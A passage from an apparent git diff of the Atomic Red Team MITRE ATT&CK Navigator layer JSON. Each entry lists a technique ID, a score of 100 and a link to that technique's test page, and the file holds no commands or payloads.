.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1
546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/
master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/red
canaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"http
s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":tr
ue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator 
Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-t
eam/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002"
,"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030
","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":1
00,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https:
//github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled"